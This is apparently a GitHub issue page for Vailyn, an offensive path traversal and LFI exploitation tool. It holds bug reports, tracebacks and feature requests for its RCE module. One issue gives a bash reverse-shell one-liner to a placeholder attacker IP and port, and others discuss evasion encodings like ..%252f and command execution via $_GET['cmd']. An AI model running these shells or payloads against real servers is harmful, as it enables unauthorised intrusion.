vainlystrain / vailyn
A phased, evasive Path Traversal + LFI scanning & exploitation tool in Python
License: GNU General Public License v3.0
When downloading files, extract the leaked data from the rest of the HTML document.
The attack routines are way too complex, and contain duplicate code. Clean them up by splitting them into several smaller functions, and regrouping similar behaviour in 1 function.
In the current version, every RCE technique is probed at every run. Add a choice prompt (like the one for payloads) that lets the user select which techniques to use.
Category
Installation issue on Kali
Describe the bug
Installation fails due to pyqt5 dependency
To Reproduce
pip install -r requirements.txt
root@kali:/opt/Vailyn# pip install -r requirements.txt
DEPRECATION: Python 2.7 reached the end of its life on January 1st, 2020. Please upgrade your Python as Python 2.7 is no longer maintained. pip 21.0 will drop support for Python 2.7 in January 2021. More details about Python 2 support in pip can be found at https://pip.pypa.io/en/latest/development/release-process/#python-2-support
Collecting treelib
Using cached treelib-1.6.1.tar.gz (24 kB)
Requirement already satisfied: requests in /usr/local/lib/python2.7/dist-packages (from -r requirements.txt (line 2)) (2.18.4)
Requirement already satisfied: argparse in /usr/lib/python2.7 (from -r requirements.txt (line 3)) (1.2.1)
Requirement already satisfied: colorama in /usr/local/lib/python2.7/dist-packages (from -r requirements.txt (line 4)) (0.4.3)
ERROR: Could not find a version that satisfies the requirement PyQt5 (from -r requirements.txt (line 5)) (from versions: none)
ERROR: No matching distribution found for PyQt5 (from -r requirements.txt (line 5))
Expected behaviour
Clean installation is expected.
Desktop
Distributor ID: Kali
Description: Kali GNU/Linux Rolling
Release: 2020.3
Codename: kali-rolling
Linux kali 5.4.0-kali4-amd64 #1 SMP Debian 5.4.19-1kali1 (2020-02-17) x86_64 GNU/Linux
Provide more output in the RCE module, both for CLI and GUI.
Make it easier to switch the payload used for RCE by saving it in one variable.
Remove hardcoded depth from RCE and replace it by the depth used in the leak phase.
The RCE module does not scan for null bytes. This will be fixed together with #7 .
Add support for RFI scanning & exploitation.
In Phase 1, it is possible to do a targeted attack. If you know file.php is just above the inclusion folder, you can specify -d 1 x x to greatly reduce the attack duration.
However, if the file sits 3 levels above, Vailyn will still check levels 1 and 2.
Extend the targeted attack feature with a new argument --targeted. If provided, only check the exact Phase 1 depth.
If the target server is only running on 1 thread, and a reverse shell is spawned, the server doesn't accept HTTP connections any more, leading to a DoS scenario. If this happens in your operation, perform the following steps:
bash -i >& /dev/tcp/{YOUR IP}/{NEW PORT} 0>&1 & exit
This will spawn a new shell on your second port and terminate the first, and the server will accept connections again.
Add an option to scan for absolute paths, instead of relative ones.
root@kali:~/Vailyn# python3 Vailyn -h
Traceback (most recent call last):
File "/usr/lib/python3/dist-packages/dbus/bus.py", line 177, in activate_name_owner
return self.get_name_owner(bus_name)
File "/usr/lib/python3/dist-packages/dbus/bus.py", line 361, in get_name_owner
return self.call_blocking(BUS_DAEMON_NAME, BUS_DAEMON_PATH,
File "/usr/lib/python3/dist-packages/dbus/connection.py", line 652, in call_blocking
reply_message = self.send_message_with_reply_and_block(
dbus.exceptions.DBusException: org.freedesktop.DBus.Error.NameHasNoOwner: Could not get owner of name 'org.freedesktop.Notifications': no such name
During handling of the above exception, another exception occurred:
Traceback (most recent call last):
File "/root/Vailyn/Vailyn", line 113, in <module>
notify2.init("Vailyn")
File "/usr/local/lib/python3.9/dist-packages/notify2.py", line 102, in init
dbus_obj = bus.get_object('org.freedesktop.Notifications',
File "/usr/lib/python3/dist-packages/dbus/bus.py", line 241, in get_object
return self.ProxyObjectClass(self, bus_name, object_path,
File "/usr/lib/python3/dist-packages/dbus/proxies.py", line 250, in __init__
self._named_service = conn.activate_name_owner(bus_name)
File "/usr/lib/python3/dist-packages/dbus/bus.py", line 182, in activate_name_owner
self.start_service_by_name(bus_name)
File "/usr/lib/python3/dist-packages/dbus/bus.py", line 277, in start_service_by_name
return (True, self.call_blocking(BUS_DAEMON_NAME, BUS_DAEMON_PATH,
File "/usr/lib/python3/dist-packages/dbus/connection.py", line 652, in call_blocking
reply_message = self.send_message_with_reply_and_block(
dbus.exceptions.DBusException: org.freedesktop.DBus.Error.ServiceUnknown: The name org.freedesktop.Notifications was not provided by any .service files
Add a possibility to configure the crawler to only scan for a subset of vectors (instead of all).
Greetings!
I started the first run about 25 minutes back. The % loading is at 13%. This is a query attack run (-a 1) with a very short file & directory list (<10 entries).
Thanks.
In Vailyn 2.3, a severe memory issue has been resolved, which caused systems to run out of memory with big directory dictionaries. Users are advised to update to the latest version, especially when attacking with huge dictionaries. More improvements towards dictionary handling are planned in the future.
Add an option to config.py that lets the user specify a custom payload for the RCE module.
Is your feature request related to a problem? Please describe.
In Vailyn 1.5.1, attacking through Tor is only possible for Linux, because the command used to start the service (systemctl), is not available on Windows.
Describe the solution you'd like
Make Tor piping available for Windows-based systems.
Additional context
Since I don't have a Windows machine (and VM installations are broken), I will need a hand for implementing this.
Before trying to spawn a full bash shell, confirm that RCE works using $_GET["cmd"].
Category
False Positive | False Negative
Describe the bug
The requests library which this project uses has some strange behaviours, which leads to the POST attack (-a 4) not working correctly.
The issue:
When you use a data dictionary for the POST request, requests percent-encodes the POST data. This leads to more complex evasion payloads failing, even if they should work. Also, the output of the scanner will be wrong. Let's say the server is vulnerable to ..%252f. Then, when Vailyn scans for ..%2f, it is detected as vulnerable, since requests transforms it into %252f. However, ..%2f will be shown as successful, while the real %252f test won't be.
There have been several ways to fix that in the past - none of them worked in this case.
The first way I have tried to fix it is using prepared requests, and manually setting the body afterwards. The second way was that I used a string for the data argument, instead of a dict. However, both tries resulted in the scanner finding nothing at all, despite a vulnerability being present.
If anyone reading this knows a fix: I'd really appreciate your help!
To Reproduce
Steps to reproduce the behaviour:
Expected behaviour
Vailyn should output the vulnerability, and the correct payload.
Desktop (please complete the following information):
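The mismatch described in this report, as an added illustration that is not Vailyn's own code: a dict body is form-encoded by the client (requests uses urllib.parse.urlencode for this), so the single percent sign in the candidate is re-encoded before it leaves the client, and the scanner's label no longer matches what the application actually received. The field name "file" and a server that URL-decodes the body exactly once are assumptions for the example.

```python
"""Added example (not part of Vailyn): trace a traversal candidate through
the client's form encoding and the server's single URL-decode, so a
finding can be labelled with the encoding that really reached the app.
"""
from urllib.parse import unquote, urlencode

# Constructed candidates, limited to the encodings the report discusses.
CANDIDATES = ["../", "..%2f", "..%252f"]


def wire_body(field: str, candidate: str, as_dict: bool) -> str:
    """Return the body string the client sends.

    as_dict=True mirrors requests.post(url, data={field: candidate}),
    which form-encodes the value (urlencode turns '%' into '%25').
    as_dict=False mirrors requests.post(url, data=f"{field}={candidate}"),
    where the string is sent verbatim.
    """
    if as_dict:
        return urlencode({field: candidate})
    return f"{field}={candidate}"


def value_seen_by_app(body: str, field: str) -> str:
    """Assumed server behaviour: decode the form body exactly once."""
    raw = body.split(field + "=", 1)[1]
    return unquote(raw)


def classify(field: str, candidate: str, as_dict: bool) -> dict:
    """Report intended candidate, bytes actually sent and value the app saw.

    With as_dict=True and candidate '..%2f', the wire carries '..%252f' and
    the app sees '..%2f': a hit here is really a '..%252f' finding, which
    is the misreport the issue describes.
    """
    sent = wire_body(field, candidate, as_dict)
    return {
        "intended": candidate,
        "sent": sent.split("=", 1)[1],
        "app_saw": value_seen_by_app(sent, field),
    }


if __name__ == "__main__":
    for cand in CANDIDATES:
        for as_dict in (True, False):
            print(f"as_dict={as_dict!s:5}", classify("file", cand, as_dict))
```

Comparing the "intended" and "app_saw" columns side by side is what tells you whether a reported hit was for the encoding the scanner claims or for the doubly-encoded one.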
Add an option to exploit a path traversal in an upload routine, in order to replace a legitimate server file by a version containing a user-specified payload.
Redirect the spawned subprocess to /dev/null, hiding the GUI output in the main Vailyn terminal.
Category
| Program Crash |
Describe the bug
The program gives the error:
└─# python3.8 Vailyn
Traceback (most recent call last):
File "Vailyn", line 40, in <module>
from PyQt5.QtCore import Qt
ModuleNotFoundError: No module named 'PyQt5.sip'
I have installed all required modules, yet I get the above error.
To Reproduce
Steps to reproduce the behaviour:
Expected behaviour
The program to run.
Screenshots
If applicable, add screenshots to help explain your problem.
Desktop (please complete the following information):
Additional context
Add any other context about the problem here.
The example commands include dicts/files and dicts/dirs as the wordlists to use.
They are not included on the repo, are we supposed to get them elsewhere or create them? Seems strange that the one thing needed to make the tool work is missing from the repo. dirs2 and files2 are included but they are too limited to be effective. Maybe I'm misunderstanding the intention behind this project.
I would suggest adding to the wiki some mention of the wordlists to clarify. I'm shocked I'm the first person to ask this.